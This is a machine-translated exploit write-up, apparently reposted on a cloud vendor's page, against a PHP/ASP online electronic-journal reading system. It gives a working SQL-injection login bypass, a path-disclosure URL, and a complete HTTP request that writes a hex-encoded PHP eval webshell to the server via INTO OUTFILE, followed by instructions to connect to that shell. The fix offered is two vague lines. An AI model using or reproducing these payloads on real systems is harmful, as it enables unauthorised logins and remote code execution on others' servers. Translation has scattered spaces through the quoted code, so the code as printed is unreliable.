Popular electronic journals online reading system PHP and ASP latest versions kill SQL Injection & amp; PHP version getshell (No Logon required)

Source: Internet
Author: User

Popular electronic journals online reading system PHP and ASP latest versions kill SQL Injection & amp; PHP version getshell (No Logon required)

Latest versions of PHP and ASP for online Reading System of Electronic Journals
1. Kill SQL Injection
2. PHP getshell (No Logon required)
3. Website brute-force attack path

 


1. SQL injection. PHP and ASP are both effective!

PHP version:

Background login code. The problem lies in the verification function:

Global. fun. php


 

// Log on to function function_login () {session_start (); function_safety (); $ username = function_cleanstr ($ _ POST ['username']); $ password = md5 ($ _ POST ['Password']); $ code = md5 (strtoupper ($ _ POST ['code']); if ($ username = ''or $ password ='') {function_alert ('user name and password cannot be blank! ', 'Index. php');} if ($ code! = $ _ SESSION ['code']) {function_alert ('verification code error! ', 'Index. php');} if (! _ Query ("SELECT * FROM magacms_user WHERE username = '$ username' AND password =' $ password' LIMIT 1") {function_alert ('user name AND password are incorrect! ', 'Index. php ');} $ intime = date ('Y-m-d H: I: s', time (); $ inip = function_getRealIp (); // setcookie ('username', md5 ($ username); // use cookies to remember the logon Status $ _ SESSION ['username'] = $ username; // use session to remember the logon status _ update ("UPDATE magacms_user SET intime = '$ intime', inip =' $ inip' WHERE username = '$ username '"); function_alert ('', 'admin _ main. php ');}

 

$ Username = function_cleanstr ($ _ POST ['username']); is used to obtain this parameter, the tracking function function_cleanst only performs html encoding on the parameters, as shown below:

// String Formatting function function_cleanstr ($ str) {$ newstr = htmlspecialchars (trim ($ str); // Delete spaces on both sides and transcode html return $ newstr ;}


Htmlspecialchars only filters HTML Tag characters such as <>. Therefore, the username field is injected and directly substituted

SELECT * FROM magacms_user WHERE username = '$ username' AND password =' $ password' LIMIT 1

SQL query.

Therefore, for any system, you only need to know the user name to log on to the system...

 



Login successful...
 



Executed SQL:

241 QuerySELECT * FROM magacms_user WHERE username='admin' OR 'A'='A' AND password='0cc175b9c0f1b6a831c399e269772661' LIMIT 1


 



ASP version:

Code analysis is similar to PHP

Logon submission: admin 'or 'A' = 'a

 

Login successful
 



2. Website brute-force attack path

Directly submit:/admin/shortdes/upload. inc. php? Action = upfile


 



The burst path is:

E: \ phpStudy \ WWW \ wwzzs \ admin \ shortdes \ upload. inc. php

3. PHP getshell

POST submission

POST /wwzzs/admin/?action=login HTTP/1.1Host: localhost:808User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://202.113.76.211:808/wwzzs/admin/Cookie: PHPSESSID=923954107451195a03f88567d6fa0accConnection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 183username=admin' and 1=2 UNION SELECT 0x3C3F70687020406576616C28245F504F53545B2741275D293B3F3E,2,3,4,5 into outfile 'E:/phpStudy/WWW/wwzzs/upload/bannerpic/t.php'#&password=a&code=A56M



Access:

Http: // localhost: 808/wwzzs/upload/bannerpic/t. php

Connection kitchen knife:

 



Executed SQL:
 

249 QuerySELECT * FROM magacms_user WHERE username='admin' and 1=2 UNION SELECT 0x3C3F70687020406576616C28245F504F53545B2741275D293B3F3E,2,3,4,5 into outfile 'E:/phpStudy/WWW/wwzzs/upload/bannerpic/t.php'#' AND password='0cc175b9c0f1b6a831c399e269772661' LIMIT 1



Execution completed.
 

 

  Solution:

Background login filter...

File Access restrictions...

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.